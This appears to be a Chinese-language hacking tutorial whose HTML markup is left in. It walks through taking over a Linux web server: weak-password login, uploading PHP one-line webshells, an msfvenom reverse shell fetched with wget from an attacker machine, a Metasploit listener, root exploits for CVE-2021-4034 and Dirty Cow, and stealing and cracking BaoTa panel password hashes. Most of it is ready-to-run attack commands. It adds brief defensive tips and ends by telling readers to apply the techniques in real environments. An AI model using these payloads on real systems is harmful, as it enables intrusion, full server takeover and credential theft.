Linux提权技术实战教学：从文件上传到Root权限获取<\/h1>

一、初始访问：弱口令与文件上传漏洞利用<\/h2>

1.1 弱口令登录<\/h3>
目标系统：Web应用后台<\/li>
尝试常用弱口令组合：admin\/admin<\/code><\/li>
成功进入后台管理界面<\/li>
<\/ul>
1.2 文件上传漏洞利用<\/h3>

发现上传点<\/strong>：在后台寻找文件上传功能<\/li>
绕过前端验证<\/strong>：

使用Burp Suite拦截上传请求<\/li>
修改文件后缀或内容绕过前端过滤<\/li>
<\/ul>
<\/li>
上传Webshell<\/strong>：

使用经典PHP一句话木马：
<?<\/span>php<\/span> @<\/span>eval<\/span>($_POST['cmd'<\/span>]); ?><\/span>
<\/span><\/span><\/span><\/code><\/pre><\/li>
或使用更隐蔽的变形：
<?<\/span>php<\/span> $_GET['a'<\/span>]($_GET['b'<\/span>]); ?><\/span>
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>
获取Webshell路径<\/strong>：注意保存服务器返回的上传文件路径<\/li>
<\/ol>
二、建立持久化连接<\/h2>
2.1 使用哥斯拉(Godzilla)连接<\/h3>

哥斯拉是一款先进的Webshell管理工具<\/li>
配置连接参数：

URL：上传的Webshell路径<\/li>
密码：与Webshell中设置的密码一致<\/li>
连接类型：根据Webshell类型选择(PHP\/JSP\/ASP等)<\/li>
<\/ul>
<\/li>
<\/ul>
2.2 反弹Shell准备<\/h3>

生成Payload<\/strong>：
msfvenom -p linux\/x64\/shell_reverse_tcp LHOST=<\/span><攻击机IP> LPORT=<\/span><监听端口> -f elf -o reverse.elf
<\/span><\/span><\/code><\/pre><\/li>
上传Payload<\/strong>：

通过哥斯拉的文件管理功能上传reverse.elf<\/li>
或使用wget从攻击机下载：
wget http:\/\/<攻击机IP>\/reverse.elf -O \/tmp\/reverse.elf
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>
设置执行权限<\/strong>：
chmod +x \/tmp\/reverse.elf
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
2.3 建立监听<\/h3>
在攻击机启动Metasploit监听：<\/p>
msfconsole
<\/span><\/span>use multi\/handler
<\/span><\/span>set payload linux\/x64\/shell_reverse_tcp
<\/span><\/span>set LHOST <攻击机IP>
<\/span><\/span>set LPORT <监听端口>
<\/span><\/span>run
<\/span><\/span><\/code><\/pre>2.4 执行反弹Shell<\/h3>
在目标服务器执行：<\/p>
\/tmp\/reverse.elf
<\/span><\/span><\/code><\/pre>三、自动化提权尝试<\/h2>
3.1 使用Metasploit的suggester模块<\/h3>

在获取的Meterpreter会话中：
run post\/multi\/recon\/local_exploit_suggester
<\/span><\/span><\/code><\/pre><\/li>
分析建议的提权方法<\/li>
尝试推荐的exploit模块<\/li>
<\/ol>
3.2 常见失败原因<\/h3>

目标系统已打补丁<\/li>
环境配置不满足exploit要求<\/li>
权限限制导致exploit无法正常执行<\/li>
<\/ul>
四、手动提权技术<\/h2>
4.1 信息收集<\/h3>


系统内核版本<\/strong>：<\/p>
uname -a
<\/span><\/span>cat \/proc\/version
<\/span><\/span><\/code><\/pre>示例输出：Linux version 3.10.0...<\/code><\/p>
<\/li>

SUID提权检查<\/strong>：<\/p>
find \/ -perm -u=<\/span>s -type f 2>\/dev\/null
<\/span><\/span><\/code><\/pre>查找具有SUID权限的可执行文件<\/p>
<\/li>
<\/ol>
4.2 CVE-2021-4034 (Polkit pkexec提权)<\/h3>


漏洞影响范围<\/strong>：<\/p>

Polkit的pkexec组件<\/li>
影响大多数Linux发行版<\/li>
<\/ul>
<\/li>

漏洞验证<\/strong>：<\/p>
pkexec --version
<\/span><\/span><\/code><\/pre>检查pkexec是否存在及版本<\/p>
<\/li>

利用步骤<\/strong>：<\/p>

下载POC代码：
wget https:\/\/github.com\/ck00004\/CVE-2021-4034\/archive\/refs\/heads\/main.zip
<\/span><\/span><\/code><\/pre><\/li>
解压并编译：
unzip main.zip
<\/span><\/span>cd CVE-2021-4034-main
<\/span><\/span>make
<\/span><\/span><\/code><\/pre><\/li>
执行提权：
.\/cve-2021-4034
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>

成功标志<\/strong>：<\/p>
whoami
<\/span><\/span><\/code><\/pre>应返回root<\/code><\/p>
<\/li>
<\/ol>
4.3 Dirty Cow (CVE-2016-5195) 提权<\/h3>


漏洞影响<\/strong>：<\/p>

Linux内核版本2.6.22 < 3.9.x<\/li>
<\/ul>
<\/li>

利用步骤<\/strong>：<\/p>

下载exploit代码：
wget https:\/\/www.exploit-db.com\/download\/40839 -O dirty.c
<\/span><\/span><\/code><\/pre><\/li>
编译并执行：
gcc -pthread dirty.c -o dirty -lcrypt
<\/span><\/span>.\/dirty
<\/span><\/span><\/code><\/pre><\/li>
设置新root密码：
passwd dirty
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>

验证<\/strong>：<\/p>
su dirty
<\/span><\/span>whoami
<\/span><\/span><\/code><\/pre>应返回root<\/code><\/p>
<\/li>
<\/ol>
五、敏感信息收集<\/h2>
5.1 获取宝塔面板凭证<\/h3>


定位数据库文件<\/strong>：<\/p>
find \/ -name "default.db"<\/span> 2>\/dev\/null
<\/span><\/span><\/code><\/pre>常见路径：\/www\/server\/panel\/data\/default.db<\/code><\/p>
<\/li>

复制到Web目录<\/strong>：<\/p>
cp \/www\/server\/panel\/data\/default.db \/var\/www\/html\/
<\/span><\/span><\/code><\/pre>或使用其他可访问路径<\/p>
<\/li>

下载分析<\/strong>：<\/p>

使用浏览器或wget下载数据库文件<\/li>
使用SQLite浏览器或Navicat打开<\/li>
查找users表获取密码hash<\/li>
<\/ul>
<\/li>

密码破解<\/strong>：<\/p>

识别hash类型(通常为sha256加盐)<\/li>
使用hashcat或john尝试破解<\/li>
<\/ul>
<\/li>
<\/ol>
六、关键知识点总结<\/h2>


文件上传漏洞利用<\/strong>：<\/p>

前端过滤绕过技术<\/li>
Webshell编写与变形<\/li>
路径记录与访问<\/li>
<\/ul>
<\/li>

持久化连接建立<\/strong>：<\/p>

哥斯拉工具使用<\/li>
反弹Shell生成与监听<\/li>
文件上传与执行<\/li>
<\/ul>
<\/li>

提权技术<\/strong>：<\/p>

Metasploit自动化提权<\/li>
SUID权限检查与利用<\/li>
CVE漏洞研究与应用

CVE-2021-4034 (Polkit pkexec)<\/li>
Dirty Cow (CVE-2016-5195)<\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>

敏感信息收集<\/strong>：<\/p>

数据库文件定位<\/li>
文件复制与下载技巧<\/li>
密码hash提取与分析<\/li>
<\/ul>
<\/li>

方法论<\/strong>：<\/p>

自动化工具与手动技术的结合<\/li>
信息收集的重要性<\/li>
CVE漏洞库的持续关注<\/li>
社区资源的利用(遇到问题及时搜索和请教)<\/li>
<\/ul>
<\/li>
<\/ol>
七、防御建议<\/h2>


系统加固<\/strong>：<\/p>

及时更新系统和内核补丁<\/li>
限制SUID权限二进制文件<\/li>
使用最小权限原则<\/li>
<\/ul>
<\/li>

应用安全<\/strong>：<\/p>

禁用弱口令<\/li>
实现严格的文件上传验证<\/li>
定期安全审计<\/li>
<\/ul>
<\/li>

监控措施<\/strong>：<\/p>

监控异常进程创建<\/li>
审计特权操作<\/li>
实施文件完整性监控<\/li>
<\/ul>
<\/li>
<\/ol>
通过本教学文档，您应该能够全面理解从初始访问到最终提权的完整流程，掌握关键的技术点和工具使用方法，并在实际环境中应用这些技术。<\/p>